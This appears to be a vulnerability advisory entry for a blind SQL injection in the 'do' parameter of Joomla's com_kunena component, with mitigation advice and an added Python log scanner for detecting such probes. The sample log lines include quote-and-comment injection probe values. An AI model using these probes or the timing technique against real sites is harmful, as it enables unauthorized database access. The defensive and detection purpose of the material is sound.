vendor: Joomla
by: B-HUNT3|2
CVSS: 5,5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: Joomla
Affected Version From: 1.5.9
Affected Version To: Unknown
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: LocalHost
2020
Joomla (com_kunena) BLIND SQL Injection Vulnerability
The input variable "do" is vulnerable to SQL injection, which allows an attacker to execute arbitrary SQL queries. The vulnerability is confirmed in Joomla version 1.5.9, but other versions are probably also affected. The proof of concept sends a malicious SQL query in the vulnerable "do" parameter. Because the injection is blind, the server's response time is used to determine whether the query succeeded.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
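A detection-side view of the description above, as an added example that is not part of the original advisory: it scans web access logs for com_kunena requests whose "do" value is not a plain command token and marks the ones that also took unusually long to answer. The log layout (Apache combined format with the %D response time in microseconds appended), the sample lines, the allow-list pattern and the 3-second threshold are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not from a real server): Apache combined-style
# entries with the %D response time in microseconds as the last field.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?option=com_kunena&func=view&do=show HTTP/1.1" 200 5120 210000
192.0.2.44 - - [01/Jan/2020:10:00:07 +0000] "GET /index.php?option=com_kunena&do=show%27 HTTP/1.1" 200 5120 230000
192.0.2.44 - - [01/Jan/2020:10:00:19 +0000] "GET /index.php?option=com_kunena&do=show%27%20--%20 HTTP/1.1" 200 312 5400000
192.0.2.10 - - [01/Jan/2020:10:00:30 +0000] "GET /index.php?option=com_content&do=a%27b HTTP/1.1" 200 900 180000
"""

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) [^"]*" (\d{3}) \S+ (\d+)$')
SAFE_DO = re.compile(r'^[A-Za-z0-9_.-]*$')  # assumed allow-list: plain command token
SLOW_US = 3_000_000                         # assumed threshold: 3 seconds


def suspicious_requests(log_text):
    """Return com_kunena requests whose 'do' value fails the allow-list."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log layout
        ip, target, micros = m.group(1), m.group(2), int(m.group(4))
        # parse_qs percent-decodes values, so encoded quotes are seen as quotes
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if query.get("option") != ["com_kunena"]:
            continue
        for value in query.get("do", []):
            if not SAFE_DO.match(value):
                # 'slow' ties the request to the timing behaviour described above
                findings.append({"ip": ip, "do": value, "slow": micros >= SLOW_US})
    return findings


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same allow-list pattern can be enforced on the server side before the "do" value reaches any SQL query, which is the input validation the mitigation calls for.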